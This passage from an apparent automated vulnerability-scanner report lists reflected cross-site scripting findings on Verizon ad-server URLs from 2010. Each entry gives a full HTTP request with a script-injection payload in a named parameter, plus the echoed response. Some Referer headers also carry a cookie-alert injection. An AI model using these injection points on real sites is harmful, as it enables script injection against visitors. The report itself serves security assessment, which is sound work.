Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 455ad"><script>alert(1)</script>806bc4f3c6b was submitted in the webex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=455ad"><script>alert(1)</script>806bc4f3c6b&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:07:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=455ad"><script>alert(1)</script>806bc4f3c6b&search=" target="_top">
...[SNIP]...

2.492. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [webhosting parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b85"><script>alert(1)</script>ffb0bd19efc was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=c2b85"><script>alert(1)</script>ffb0bd19efc&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:06:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ervice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=c2b85"><script>alert(1)</script>ffb0bd19efc&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.493. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af8d6"><script>alert(1)</script>501680d1fb7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.netaf8d6"><script>alert(1)</script>501680d1fb7/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:29:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 359
Content-Type: text/html
Cache-Control: private
Content-Length: 359

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.netaf8d6"><script>alert(1)</script>501680d1fb7/homepage/865674758/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.494. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6805"><script>alert(1)</script>77627a7ab77 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepagec6805"><script>alert(1)</script>77627a7ab77/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:29:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepagec6805"><script>alert(1)</script>77627a7ab77/L15/781148761/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&po
...[SNIP]...

2.495. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0423"><script>alert(1)</script>f58a07e8730 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/c0423"><script>alert(1)</script>f58a07e8730?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:29:48 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PKCpLT10erias|T10erics|O10escOu; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.verizononline.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 1574
Content-Type: text/html
Cache-Control: private
Content-Length: 1574

<IFRAME SRC="http://ad.doubleclick.net/adi/N3285.verizon/B2343920.24;sz=300x250;click0=http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/c0423"><script>alert(1)</script>f58a07e8730/L24/848533260/UNKNOWN/VDSL/LMB_NAF_vzp_300_2010_11_01/LMB_NAF_vzc_300_2009-07.html/726e6f58326b7a6e4b45494141693565?;ord=848533260?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0
...[SNIP]...

2.496. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41191"><script>alert(1)</script>0da3d09134b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top41191"><script>alert(1)</script>0da3d09134b?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:29:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 352
Content-Type: text/html
Cache-Control: private
Content-Length: 352

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/1975813609/Top41191"><script>alert(1)</script>0da3d09134b/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.497. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [audio_conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4fe7"><script>alert(1)</script>1f5c0dfe1f was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=f4fe7"><script>alert(1)</script>1f5c0dfe1f&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=f4fe7"><script>alert(1)</script>1f5c0dfe1f&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.498. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [bbaw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80a8f"><script>alert(1)</script>f23122a1d8 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=80a8f"><script>alert(1)</script>f23122a1d8&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=80a8f"><script>alert(1)</script>f23122a1d8&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.499. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [connex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a34"><script>alert(1)</script>b0bded3b110 was submitted in the connex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=56a34"><script>alert(1)</script>b0bded3b110&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
latformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=56a34"><script>alert(1)</script>b0bded3b110&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_
...[SNIP]...

2.500. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [fiostvown parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ebca"><script>alert(1)</script>d5b1bdef200 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=8ebca"><script>alert(1)</script>d5b1bdef200&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=8ebca"><script>alert(1)</script>d5b1bdef200&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.501. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [fiosvoice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56b2"><script>alert(1)</script>793da9e8592 was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=f56b2"><script>alert(1)</script>793da9e8592&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
